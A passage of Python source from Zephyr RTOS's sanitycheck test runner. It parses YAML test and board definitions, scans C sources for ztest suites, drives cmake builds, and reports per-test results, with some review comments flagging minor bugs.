                self.rom_size += size
                if not self.is_xip:
                    self.ram_size += size
                stype = "ro"
            else:
                stype = "unknown"
                if name not in self.extra_sections:
                    recognized = False
            self.sections.append({"name": name, "load_addr": load_addr,
                                  "size": size, "virt_addr": virt_addr,
                                  "type": stype, "recognized": recognized})
class SanityConfigParser:
    """Class to read test case files with semantic checking
    """

    def __init__(self, filename, schema):
        """Instantiate a new SanityConfigParser object

        @param filename Source .yaml file to read
        @param schema Loaded YAML schema used by load() to verify the file
        """
        self.data = {}
        self.schema = schema
        self.filename = filename
        self.tests = {}
        self.common = {}

    def load(self):
        """Load and schema-verify the YAML file, populating self.tests and
        self.common from its 'tests' and 'common' sections."""
        self.data = scl.yaml_load_verify(self.filename, self.schema)
        if 'tests' in self.data:
            self.tests = self.data['tests']
        if 'common' in self.data:
            self.common = self.data['common']

    def _cast_value(self, value, typestr):
        # Convert a raw YAML value to the type named by typestr: "str",
        # "float", "int", "bool", "list[:T]", "set[:T]" or "map".
        if isinstance(value, str):
            v = value.strip()
        if typestr == "str":
            # NOTE(review): v is only bound when value is a str; a non-str
            # value with typestr "str" would raise NameError — confirm
            # callers always pass strings for "str"-typed keys.
            return v
        elif typestr == "float":
            return float(value)
        elif typestr == "int":
            return int(value)
        elif typestr == "bool":
            return value
        elif typestr.startswith("list") and isinstance(value, list):
            return value
        elif typestr.startswith("list") and isinstance(value, str):
            vs = v.split()
            # "list:T" → element-wise conversion; bare "list" → strings.
            if len(typestr) > 4 and typestr[4] == ":":
                return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
            else:
                return vs
        elif typestr.startswith("set"):
            # NOTE(review): unlike the list branch, this uses v without
            # checking isinstance(value, str) first — same caveat as above.
            vs = v.split()
            if len(typestr) > 3 and typestr[3] == ":":
                return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
            else:
                return set(vs)
        elif typestr.startswith("map"):
            return value
        else:
            # NOTE(review): the message interpolates the value, not the
            # unknown type string — typestr was likely intended here.
            raise ConfigurationError(
                self.filename, "unknown type '%s'" % value)

    def get_test(self, name, valid_keys):
        """Get a dictionary representing the keys/values within a test

        @param name The test in the .yaml file to retrieve data from
        @param valid_keys A dictionary representing the intended semantics
            for this test. Each key in this dictionary is a key that could
            be specified, if a key is given in the .yaml file which isn't in
            here, it will generate an error. Each value in this dictionary
            is another dictionary containing metadata:

            "default" - Default value if not given
            "type" - Data type to convert the text value to. Simple types
                supported are "str", "float", "int", "bool" which will get
                converted to respective Python data types. "set" and "list"
                may also be specified which will split the value by
                whitespace (but keep the elements as strings). finally,
                "list:<type>" and "set:<type>" may be given which will
                perform a type conversion after splitting the value up.
            "required" - If true, raise an error if not defined. If false
                and "default" isn't specified, a type conversion will be
                done on an empty string

        @return A dictionary containing the test key-value pairs with
            type conversion and default values filled in per valid_keys
        """
        d = {}
        # Start from the file's "common" section, then overlay per-test keys.
        for k, v in self.common.items():
            d[k] = v
        for k, v in self.tests[name].items():
            if k not in valid_keys:
                raise ConfigurationError(
                    self.filename,
                    "Unknown config key '%s' in definition for '%s'" %
                    (k, name))
            if k in d:
                if isinstance(d[k], str):
                    # By default, we just concatenate string values of keys
                    # which appear both in "common" and per-test sections,
                    # but some keys are handled in adhoc way based on their
                    # semantics.
                    if k == "filter":
                        d[k] = "(%s) and (%s)" % (d[k], v)
                    else:
                        d[k] += " " + v
            else:
                d[k] = v
        # Fill defaults / enforce "required" / convert types for every
        # declared key.
        for k, kinfo in valid_keys.items():
            if k not in d:
                if "required" in kinfo:
                    required = kinfo["required"]
                else:
                    required = False
                if required:
                    raise ConfigurationError(
                        self.filename,
                        "missing required value for '%s' in test '%s'" %
                        (k, name))
                else:
                    if "default" in kinfo:
                        default = kinfo["default"]
                    else:
                        default = self._cast_value("", kinfo["type"])
                    d[k] = default
            else:
                try:
                    d[k] = self._cast_value(d[k], kinfo["type"])
                except ValueError:
                    raise ConfigurationError(
                        self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
                        (kinfo["type"], d[k], k, name))
        return d
class Platform:
    """Class representing metadata for a particular platform

    Maps directly to BOARD when building"""

    platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
        "scripts", "sanity_chk", "platform-schema.yaml"))

    def __init__(self):
        """Initialize every attribute to its documented default value."""
        self.name = ""
        self.sanitycheck = True
        # if no RAM size is specified by the board, take a default of 128K
        self.ram = 128
        self.ignore_tags = []
        self.default = False
        # if no flash size is specified by the board, take a default of 512K
        self.flash = 512
        self.supported = set()
        self.arch = ""
        self.type = "na"
        self.simulation = "na"
        self.supported_toolchains = []
        self.env = []
        self.env_satisfied = True
        self.filter_data = dict()

    def load(self, platform_file):
        """Populate this Platform from a schema-checked board .yaml file.

        @param platform_file Path to the board's .yaml description
        """
        parser = SanityConfigParser(platform_file, self.platform_schema)
        parser.load()
        data = parser.data

        self.name = data['identifier']
        self.sanitycheck = data.get("sanitycheck", True)
        # if no RAM size is specified by the board, take a default of 128K
        self.ram = data.get("ram", 128)

        testing = data.get("testing", {})
        self.ignore_tags = testing.get("ignore_tags", [])
        self.default = testing.get("default", False)
        # if no flash size is specified by the board, take a default of 512K
        self.flash = data.get("flash", 512)

        # Each "supported" entry may bundle colon-separated features;
        # flatten them all into one set.
        self.supported = {feature
                          for group in data.get("supported", [])
                          for feature in group.split(":")}

        self.arch = data['arch']
        self.type = data.get('type', "na")
        self.simulation = data.get('simulation', "na")
        self.supported_toolchains = data.get("toolchain", [])
        self.env = data.get("env", [])
        # Satisfied only when every required environment variable is set
        # to a non-empty value.
        self.env_satisfied = all(os.environ.get(var, None) for var in self.env)

    def __repr__(self):
        return "<{} on {}>".format(self.name, self.arch)
class TestCase(object):
    """Class representing a test application
    """

    def __init__(self):
        """TestCase constructor.

        This gets called by TestSuite as it finds and reads test yaml files.
        Multiple TestCase instances may be generated from a single testcase.yaml,
        each one corresponds to an entry within that file.

        We need to have a unique name for every single test case. Since
        a testcase.yaml can define multiple tests, the canonical name for
        the test case is <workdir>/<name>.

        NOTE: the constructor itself takes no arguments; the attributes
        below are filled in by the caller after construction. The values
        described here come from:

        @param testcase_root os.path.abspath() of one of the --testcase-root
        @param workdir Sub-directory of testcase_root where the
            .yaml test configuration file was found
        @param name Name of this test case, corresponding to the entry name
            in the test case configuration file. For many test cases that just
            define one test, can be anything and is usually "test". This is
            really only used to distinguish between different cases when
            the testcase.yaml defines multiple tests
        @param tc_dict Dictionary with test values for this test case
            from the testcase.yaml file
        """
        self.id = ""
        self.source_dir = ""
        self.yamlfile = ""
        self.cases = []
        self.name = ""
        self.type = None
        self.tags = None
        self.extra_args = None
        self.extra_configs = None
        self.arch_whitelist = None
        self.arch_exclude = None
        self.skip = None
        self.platform_exclude = None
        self.platform_whitelist = None
        self.toolchain_exclude = None
        self.toolchain_whitelist = None
        self.tc_filter = None
        self.timeout = 60
        self.harness = ""
        self.harness_config = {}
        self.build_only = True
        self.build_on_all = False
        self.slow = False
        self.min_ram = None
        self.depends_on = None
        self.min_flash = None
        self.extra_sections = None

    @staticmethod
    def get_unique(testcase_root, workdir, name):
        """Build the canonical unique name for a test case, prefixed with
        the testcase root's ZEPHYR_BASE-relative path when applicable."""
        canonical_testcase_root = os.path.realpath(testcase_root)
        if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
            # This is in ZEPHYR_BASE, so include path in name for uniqueness
            # FIXME: We should not depend on path of test for unique names.
            relative_tc_root = os.path.relpath(canonical_testcase_root,
                                               start=canonical_zephyr_base)
        else:
            relative_tc_root = ""
        # workdir can be "."
        unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
        return unique

    @staticmethod
    def scan_file(inf_name):
        """Scan one C source file for ztest sub-test declarations.

        @param inf_name Path to the C file to scan (memory-mapped read-only)
        @return tuple (matches, warnings): sub-case names with the "test_"
            prefix stripped (or None when no ztest_test_suite is present),
            and a warning string (or None)
        @raises ValueError when a suite is declared but never run
        """
        suite_regex = re.compile(
            # do not match until end-of-line, otherwise we won't allow
            # stc_regex below to catch the ones that are declared in the same
            # line--as we only search starting the end of this match
            br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
            re.MULTILINE)
        stc_regex = re.compile(
            br"^\s*"  # empty space at the beginning is ok
            # catch the case where it is declared in the same sentence, e.g:
            #
            # ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
            br"(?:ztest_test_suite\([a-zA-Z0-9_]+,\s*)?"
            # Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
            br"ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?"
            # Consume the argument that becomes the extra testcase
            br"\(\s*"
            br"(?P<stc_name>[a-zA-Z0-9_]+)"
            # _setup_teardown() variant has two extra arguments that we ignore
            br"(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?"
            br"\s*\)",
            # We don't check how it finishes; we don't care
            re.MULTILINE)
        suite_run_regex = re.compile(
            br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
            re.MULTILINE)
        achtung_regex = re.compile(
            br"(#ifdef|#endif)",
            re.MULTILINE)
        warnings = None
        with open(inf_name) as inf:
            # mmap flags differ between Windows and POSIX.
            if os.name == 'nt':
                mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
            else:
                mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
                             'offset': 0}
            with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
                # contextlib makes pylint think main_c isn't subscriptable
                # pylint: disable=unsubscriptable-object
                suite_regex_match = suite_regex.search(main_c)
                if not suite_regex_match:
                    # can't find ztest_test_suite, maybe a client, because
                    # it includes ztest.h
                    return None, None
                suite_run_match = suite_run_regex.search(main_c)
                if not suite_run_match:
                    raise ValueError("can't find ztest_run_test_suite")
                # Preprocessor conditionals inside the suite body make the
                # statically scanned sub-case list unreliable: warn.
                achtung_matches = re.findall(
                    achtung_regex,
                    main_c[suite_regex_match.end():suite_run_match.start()])
                if achtung_matches:
                    warnings = "found invalid %s in ztest_test_suite()" \
                               % ", ".join({match.decode() for match in achtung_matches})
                _matches = re.findall(
                    stc_regex,
                    main_c[suite_regex_match.end():suite_run_match.start()])
                matches = [match.decode().replace("test_", "") for match in _matches]
                return matches, warnings

    def scan_path(self, path):
        """Scan all C files under ``path`` (src/*.c and *.c) and collect the
        ztest sub-case names found in them."""
        subcases = []
        for filename in glob.glob(os.path.join(path, "src", "*.c")):
            try:
                _subcases, warnings = self.scan_file(filename)
                if warnings:
                    logger.error("%s: %s" % (filename, warnings))
                if _subcases:
                    subcases += _subcases
            except ValueError as e:
                logger.error("%s: can't find: %s" % (filename, e))
        for filename in glob.glob(os.path.join(path, "*.c")):
            try:
                _subcases, warnings = self.scan_file(filename)
                if warnings:
                    logger.error("%s: %s" % (filename, warnings))
                if _subcases:
                    subcases += _subcases
            except ValueError as e:
                logger.error("%s: can't find: %s" % (filename, e))
        return subcases

    def parse_subcases(self, test_path):
        """Populate self.cases with "<id>.<subcase>" names scanned from the
        sources, or just the id itself when no sub-cases were found."""
        results = self.scan_path(test_path)
        for sub in results:
            name = "{}.{}".format(self.id, sub)
            self.cases.append(name)
        if not results:
            self.cases.append(self.id)

    def __str__(self):
        return self.name
class TestInstance:
    """Class representing the execution of a particular TestCase on a platform

    @param testcase The TestCase object we want to build/execute
    @param platform Platform object that we want to build and run against
    @param outdir Base directory for all test results. The actual
        out directory used is <outdir>/<platform>/<test case name>
    """

    def __init__(self, testcase, platform, outdir):
        self.testcase = testcase
        self.platform = platform
        self.status = None
        self.reason = "Unknown"
        self.metrics = dict()
        self.handler = None
        self.outdir = outdir
        self.name = os.path.join(platform.name, testcase.name)
        self.build_dir = os.path.join(outdir, platform.name, testcase.name)
        # Conservative defaults until check_build_or_run() decides otherwise.
        self.build_only = True
        self.run = False
        self.results = {}

    def __lt__(self, other):
        # Ordering by the "<platform>/<testcase>" name makes instances sortable.
        return self.name < other.name

    def check_build_or_run(self, build_only=False, enable_slow=False, device_testing=False, fixture=None):
        """Decide whether this instance is build-only or actually runnable,
        setting ``self.build_only`` and ``self.run`` accordingly.

        @param build_only Force build-only regardless of runnability
        @param enable_slow Allow tests marked "slow" to run
        @param device_testing Real hardware is available to run on
        @param fixture Iterable of fixture names supplied on the command line
            (None means no fixtures; was previously a mutable [] default)
        """
        # None-sentinel avoids the shared-mutable-default pitfall.
        if fixture is None:
            fixture = []
        # right now we only support building on windows. running is still work
        # in progress.
        if os.name == 'nt':
            self.build_only = True
            self.run = False
            return
        # we asked for build-only on the command line
        if build_only or self.testcase.build_only:
            self.build_only = True
            self.run = False
            return
        # Do not run slow tests:
        skip_slow = self.testcase.slow and not enable_slow
        if skip_slow:
            self.build_only = True
            self.run = False
            return
        runnable = bool(self.testcase.type == "unit" or
                        self.platform.type == "native" or
                        self.platform.simulation in ["nsim", "renode", "qemu"] or
                        device_testing)
        # Simulators must actually be installed for the test to run.
        if self.platform.simulation == "nsim":
            if not find_executable("nsimdrv"):
                runnable = False
        if self.platform.simulation == "renode":
            if not find_executable("renode"):
                runnable = False
        # console harness allows us to run the test and capture data.
        if self.testcase.harness == 'console':
            # if we have a fixture that is also being supplied on the
            # command-line, then we need to run the test, not just build it.
            if "fixture" in self.testcase.harness_config:
                fixture_cfg = self.testcase.harness_config['fixture']
                _build_only = fixture_cfg not in fixture
            else:
                _build_only = False
        elif self.testcase.harness:
            # Any other harness needs infrastructure we can't drive here.
            _build_only = True
        else:
            _build_only = False
        # Run only when the harness allows it AND the platform is runnable.
        self.build_only = _build_only or not runnable
        self.run = not self.build_only
        return

    def create_overlay(self, platform, enable_asan=False, enable_coverage=False, coverage_platform=None):
        """Write the extra Kconfig fragment (extra configs plus optional
        coverage/ASAN options) used when building this instance.

        @param platform Platform the overlay is generated for
        @param enable_asan Add CONFIG_ASAN=y on native platforms
        @param enable_coverage Add coverage options for selected platforms
        @param coverage_platform Platform names coverage applies to
            (None means none; was previously a mutable [] default)
        """
        if coverage_platform is None:
            coverage_platform = []
        # Create this in a "sanitycheck/" subdirectory otherwise this
        # will pass this overlay to kconfig.py *twice* and kconfig.cmake
        # will silently give that second time precedence over any
        # --extra-args=CONFIG_*
        subdir = os.path.join(self.build_dir, "sanitycheck")
        os.makedirs(subdir, exist_ok=True)
        file = os.path.join(subdir, "testcase_extra.conf")
        with open(file, "w") as f:
            content = ""
            if self.testcase.extra_configs:
                content = "\n".join(self.testcase.extra_configs)
            if enable_coverage:
                if platform.name in coverage_platform:
                    content = content + "\nCONFIG_COVERAGE=y"
                    content = content + "\nCONFIG_COVERAGE_DUMP=y"
            if enable_asan:
                if platform.type == "native":
                    content = content + "\nCONFIG_ASAN=y"
            f.write(content)

    def calculate_sizes(self):
        """Get the RAM/ROM sizes of a test case.

        This can only be run after the instance has been executed by
        MakeGenerator, otherwise there won't be any binaries to measure.

        @return A SizeCalculator object
        """
        fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
        fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
        # Ignore the intermediate pre-link artifact.
        fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
        if len(fns) != 1:
            raise BuildError("Missing/multiple output ELF binary")
        return SizeCalculator(fns[0], self.testcase.extra_sections)

    def __repr__(self):
        return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
    """Wrapper around cmake: configure and build one testcase for one
    platform.  Subclasses specialize result parsing (FilterBuilder) and
    pipeline integration (ProjectBuilder).
    """
    # CONFIG_<NAME>=<value> lines from a generated .config file.
    config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
    # Generic <NAME>=<value> lines (devicetree/cmake output).
    dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')

    def __init__(self, testcase, platform, source_dir, build_dir):
        """
        @param testcase TestCase being built
        @param platform Platform being built for
        @param source_dir Directory holding the application source
        @param build_dir Output directory for this build
        """
        self.cwd = None
        self.capture_output = True
        self.defconfig = {}
        self.cmake_cache = {}
        # run_cmake() consults this flag, but only ProjectBuilder used to set
        # it; without this default, calling run_cmake() on a bare
        # CMake/FilterBuilder raised AttributeError.
        self.cmake_only = False
        self.instance = None
        self.testcase = testcase
        self.platform = platform
        self.source_dir = source_dir
        self.build_dir = build_dir
        self.log = "build.log"
        self.generator = None
        self.generator_cmd = None

    def parse_generated(self):
        """Parse generated build artifacts; overridden by FilterBuilder."""
        self.defconfig = {}
        return {}

    def run_build(self, args=None):
        """Run the build step.

        @param args Extra arguments appended to the cmake command line
               (previously a shared mutable default `[]`)
        @return dict with returncode/instance (plus msg on success), or None
                when the build succeeded without producing any output
        @note Sets self.instance.status/reason; linker section overflows are
              reported as "skipped" rather than "failed".
        """
        logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
        cmake_args = []
        cmake_args.extend(args or [])
        cmake = shutil.which('cmake')
        cmd = [cmake] + cmake_args
        kwargs = dict()
        if self.capture_output:
            kwargs['stdout'] = subprocess.PIPE
            # CMake sends the output of message() to stderr unless it's STATUS
            kwargs['stderr'] = subprocess.STDOUT
        if self.cwd:
            kwargs['cwd'] = self.cwd
        p = subprocess.Popen(cmd, **kwargs)
        out, _ = p.communicate()
        results = {}
        if p.returncode == 0:
            msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
            self.instance.status = "passed"
            results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
            if out:
                log_msg = out.decode(sys.getdefaultencoding())
                with open(os.path.join(self.build_dir, self.log), "a") as log:
                    log.write(log_msg)
            else:
                return None
        else:
            # A real error occurred, examine the output.
            # Initialize log_msg so the check below cannot hit an unbound
            # local when the process produced no output at all.
            log_msg = ""
            if out:
                log_msg = out.decode(sys.getdefaultencoding())
                with open(os.path.join(self.build_dir, self.log), "a") as log:
                    log.write(log_msg)
            if log_msg:
                # A linker region overflow means the test simply does not fit
                # this platform: skip instead of fail.
                res = re.findall("region `(FLASH|RAM|SRAM)' overflowed by", log_msg)
                if res:
                    logger.debug("Test skipped due to {} Overflow".format(res[0]))
                    self.instance.status = "skipped"
                    self.instance.reason = "{} overflow".format(res[0])
                else:
                    self.instance.status = "failed"
                    self.instance.reason = "Build failure"
            results = {
                "returncode": p.returncode,
                "instance": self.instance,
            }
        return results

    def run_cmake(self, args=None):
        """Run the cmake configure step.

        @param args Extra definitions; each is passed as -D<arg> with any
               double quotes stripped (previously a shared mutable default)
        @return dict with 'msg' and 'filter' on success, or 'returncode' on
                failure (instance status is set to "failed" in that case)
        """
        if args is None:
            args = []
        ldflags = "-Wl,--fatal-warnings"
        logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
        # fixme: add additional cflags based on options
        cmake_args = [
            '-B{}'.format(self.build_dir),
            '-S{}'.format(self.source_dir),
            '-DEXTRA_CFLAGS="-Werror ',
            '-DEXTRA_AFLAGS=-Wa,--fatal-warnings',
            '-DEXTRA_LDFLAGS="{}'.format(ldflags),
            '-G{}'.format(self.generator)
        ]
        if self.cmake_only:
            # Export compile_commands.json when we only configure, so tools
            # can still consume the tree.
            cmake_args.append("-DCMAKE_EXPORT_COMPILE_COMMANDS=1")
        args = ["-D{}".format(a.replace('"', '')) for a in args]
        cmake_args.extend(args)
        cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
        cmake_args.extend(cmake_opts)
        logger.debug("Calling cmake with arguments: {}".format(cmake_args))
        cmake = shutil.which('cmake')
        cmd = [cmake] + cmake_args
        kwargs = dict()
        if self.capture_output:
            kwargs['stdout'] = subprocess.PIPE
            # CMake sends the output of message() to stderr unless it's STATUS
            kwargs['stderr'] = subprocess.STDOUT
        if self.cwd:
            kwargs['cwd'] = self.cwd
        p = subprocess.Popen(cmd, **kwargs)
        out, _ = p.communicate()
        if p.returncode == 0:
            filter_results = self.parse_generated()
            msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
            logger.debug(msg)
            results = {'msg': msg, 'filter': filter_results}
        else:
            self.instance.status = "failed"
            self.instance.reason = "Cmake build failure"
            logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
            results = {"returncode": p.returncode}
        if out:
            with open(os.path.join(self.build_dir, self.log), "a") as log:
                log_msg = out.decode(sys.getdefaultencoding())
                log.write(log_msg)
        return results
class FilterBuilder(CMake):
    """CMake specialization used in the filtering stage: after a
    configure-only pass, parse the generated config/cache and evaluate the
    testcase's filter expression against it."""

    def __init__(self, testcase, platform, source_dir, build_dir):
        super().__init__(testcase, platform, source_dir, build_dir)
        # Separate log so filtering output does not clobber build.log.
        self.log = "config-sanitycheck.log"

    def parse_generated(self):
        """Build the filter namespace and evaluate the testcase filter.

        @return when a filter expression exists: a one-entry dict
                {<platform>/<testcase>: bool} where True means "filter this
                instance out"; otherwise the raw filter_data dict.
        """
        if self.platform.name == "unit_testing":
            return {}
        cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
        defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
        # Parse the generated .config into a CONFIG_* -> value dict.
        with open(defconfig_path, "r") as fp:
            defconfig = {}
            for line in fp.readlines():
                m = self.config_re.match(line)
                if not m:
                    # Warn about lines that are neither comments nor blank.
                    if line.strip() and not line.startswith("#"):
                        sys.stderr.write("Unrecognized line %s\n" % line)
                    continue
                defconfig[m.group(1)] = m.group(2).strip()
        self.defconfig = defconfig
        cmake_conf = {}
        try:
            cache = CMakeCache.from_file(cmake_cache_path)
        except FileNotFoundError:
            # No cache (e.g. cmake aborted early): continue with no entries.
            cache = {}
        for k in iter(cache):
            cmake_conf[k.name] = k.value
        self.cmake_cache = cmake_conf
        # Namespace visible to the testcase's filter expression: platform
        # info, the whole environment, defconfig and cmake cache values.
        filter_data = {
            "ARCH": self.platform.arch,
            "PLATFORM": self.platform.name
        }
        filter_data.update(os.environ)
        filter_data.update(self.defconfig)
        filter_data.update(self.cmake_cache)
        dts_path = os.path.join(self.build_dir, "zephyr", self.platform.name + ".dts.pre.tmp")
        if self.testcase and self.testcase.tc_filter:
            try:
                # Devicetree info is optional; expr_parser accepts edt=None.
                if os.path.exists(dts_path):
                    edt = edtlib.EDT(dts_path, [os.path.join(ZEPHYR_BASE, "dts", "bindings")])
                else:
                    edt = None
                res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
            except (ValueError, SyntaxError) as se:
                sys.stderr.write(
                    "Failed processing %s\n" % self.testcase.yamlfile)
                raise se
            # True in the returned dict means "filtered out".
            if not res:
                return {os.path.join(self.platform.name, self.testcase.name): True}
            else:
                return {os.path.join(self.platform.name, self.testcase.name): False}
        else:
            # No filter: stash the namespace on the platform for reuse.
            self.platform.filter_data = filter_data
            return filter_data
class ProjectBuilder(FilterBuilder):
    """Drive one test instance through the cmake -> build -> run -> report
    stages, posting each follow-up operation to the global `pipeline` queue
    (consumed by TestSuite.execute)."""

    def __init__(self, suite, instance, **kwargs):
        super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
        self.log = "build.log"
        self.instance = instance
        self.suite = suite
        # Tooling/sanitizer options forwarded to the run handler.
        self.lsan = kwargs.get('lsan', False)
        self.asan = kwargs.get('asan', False)
        self.valgrind = kwargs.get('valgrind', False)
        self.extra_args = kwargs.get('extra_args', [])
        self.device_testing = kwargs.get('device_testing', False)
        self.cmake_only = kwargs.get('cmake_only', False)
        self.cleanup = kwargs.get('cleanup', False)
        self.coverage = kwargs.get('coverage', False)
        self.inline_logs = kwargs.get('inline_logs', False)
        self.generator = kwargs.get('generator', None)
        self.generator_cmd = kwargs.get('generator_cmd', None)
        self.verbose = kwargs.get('verbose', None)

    @staticmethod
    def log_info(filename, inline_logs):
        """Show a log file: dump its contents when inline_logs is set,
        otherwise just print its path."""
        filename = os.path.abspath(os.path.realpath(filename))
        if inline_logs:
            logger.info("{:-^100}".format(filename))
            try:
                with open(filename) as fp:
                    data = fp.read()
            except Exception as e:
                data = "Unable to read log data (%s)\n" % (str(e))
            logger.error(data)
            logger.info("{:-^100}".format(filename))
        else:
            logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)

    def log_info_file(self, inline_logs):
        """Pick the most relevant log for this instance's outcome
        (valgrind > handler > device > build) and show it."""
        build_dir = self.instance.build_dir
        h_log = "{}/handler.log".format(build_dir)
        b_log = "{}/build.log".format(build_dir)
        v_log = "{}/valgrind.log".format(build_dir)
        d_log = "{}/device.log".format(build_dir)
        if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
            self.log_info("{}".format(v_log), inline_logs)
        elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
            self.log_info("{}".format(h_log), inline_logs)
        elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
            self.log_info("{}".format(d_log), inline_logs)
        else:
            self.log_info("{}".format(b_log), inline_logs)

    def setup_handler(self):
        """Attach the appropriate run handler (QEMU/binary/device/...) to
        the instance, based on platform simulation/type and options."""
        instance = self.instance
        args = []
        # FIXME: Needs simplification
        if instance.platform.simulation == "qemu":
            instance.handler = QEMUHandler(instance, "qemu")
            args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
            instance.handler.call_make_run = True
        elif instance.testcase.type == "unit":
            instance.handler = BinaryHandler(instance, "unit")
            instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
        elif instance.platform.type == "native":
            handler = BinaryHandler(instance, "native")
            handler.asan = self.asan
            handler.valgrind = self.valgrind
            handler.lsan = self.lsan
            handler.coverage = self.coverage
            handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
            instance.handler = handler
        elif instance.platform.simulation == "nsim":
            # Only usable when the nSIM driver is actually installed.
            if find_executable("nsimdrv"):
                instance.handler = BinaryHandler(instance, "nsim")
                instance.handler.call_make_run = True
        elif instance.platform.simulation == "renode":
            if find_executable("renode"):
                instance.handler = BinaryHandler(instance, "renode")
                instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
                instance.handler.call_make_run = True
        elif self.device_testing:
            instance.handler = DeviceHandler(instance, "device")
        if instance.handler:
            instance.handler.args = args
            instance.handler.generator_cmd = self.generator_cmd
            instance.handler.generator = self.generator

    def process(self, message):
        """Handle one pipeline message ('op' key) and enqueue the follow-up
        stage on the global `pipeline` queue."""
        op = message.get('op')
        if not self.instance.handler:
            self.setup_handler()
        # The build process, call cmake and build with configured generator
        if op == "cmake":
            results = self.cmake()
            if self.instance.status == "failed":
                pipeline.put({"op": "report", "test": self.instance})
            elif self.cmake_only:
                pipeline.put({"op": "report", "test": self.instance})
            else:
                # A True filter entry means the testcase's tc_filter
                # expression rejected this configuration.
                if self.instance.name in results['filter'] and results['filter'][self.instance.name]:
                    logger.debug("filtering %s" % self.instance.name)
                    self.instance.status = "skipped"
                    self.instance.reason = "filter"
                    pipeline.put({"op": "report", "test": self.instance})
                else:
                    pipeline.put({"op": "build", "test": self.instance})
        elif op == "build":
            logger.debug("build test: %s" % self.instance.name)
            results = self.build()
            if not results:
                self.instance.status = "failed"
                self.instance.reason = "Build Failure"
                pipeline.put({"op": "report", "test": self.instance})
            else:
                if results.get('returncode', 1) > 0:
                    pipeline.put({"op": "report", "test": self.instance})
                else:
                    if self.instance.run:
                        pipeline.put({"op": "run", "test": self.instance})
                    else:
                        pipeline.put({"op": "report", "test": self.instance})
        # Run the generated binary using one of the supported handlers
        elif op == "run":
            logger.debug("run test: %s" % self.instance.name)
            self.run()
            self.instance.status, _ = self.instance.handler.get_state()
            pipeline.put({
                "op": "report",
                "test": self.instance,
                "state": "executed",
                "status": self.instance.status,
                "reason": self.instance.reason}
            )
        # Report results and output progress to screen
        elif op == "report":
            # report_lock serializes console/report output across workers.
            with report_lock:
                self.report_out()
            if self.cleanup and not self.coverage and self.instance.status == "passed":
                pipeline.put({
                    "op": "cleanup",
                    "test": self.instance
                })
        elif op == "cleanup":
            self.cleanup_artifacts()

    def cleanup_artifacts(self):
        """Delete build artifacts, keeping only configs and logs."""
        logger.debug("Cleaning up {}".format(self.instance.build_dir))
        whitelist = [
            'zephyr/.config',
            'handler.log',
            'build.log',
            'device.log',
        ]
        whitelist = [os.path.join(self.instance.build_dir, file) for file in whitelist]
        # Walk bottom-up so emptied directories can be removed as we go.
        for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
            for name in filenames:
                path = os.path.join(dirpath, name)
                if path not in whitelist:
                    os.remove(path)
            # Remove empty directories and symbolic links to directories
            for dir in dirnames:
                path = os.path.join(dirpath, dir)
                if os.path.islink(path):
                    os.remove(path)
                elif not os.listdir(path):
                    os.rmdir(path)

    def report_out(self):
        """Update suite counters and print per-test progress/result."""
        total_tests_width = len(str(self.suite.total_tests))
        self.suite.total_done += 1
        instance = self.instance
        if instance.status in ["failed", "timeout"]:
            self.suite.total_failed += 1
            if self.verbose:
                status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
            else:
                print("")
                logger.error(
                    "{:<25} {:<50} {}FAILED{}: {}".format(
                        instance.platform.name,
                        instance.testcase.name,
                        Fore.RED,
                        Fore.RESET,
                        instance.reason))
            if not self.verbose:
                self.log_info_file(self.inline_logs)
        elif instance.status == "skipped":
            self.suite.total_skipped += 1
            status = Fore.YELLOW + "SKIPPED" + Fore.RESET
        else:
            status = Fore.GREEN + "PASSED" + Fore.RESET
        if self.verbose:
            if self.cmake_only:
                more_info = "cmake"
            elif instance.status == "skipped":
                more_info = instance.reason
            else:
                if instance.handler and instance.run:
                    more_info = instance.handler.type_str
                    htime = instance.handler.duration
                    if htime:
                        more_info += " {:.3f}s".format(htime)
                else:
                    more_info = "build"
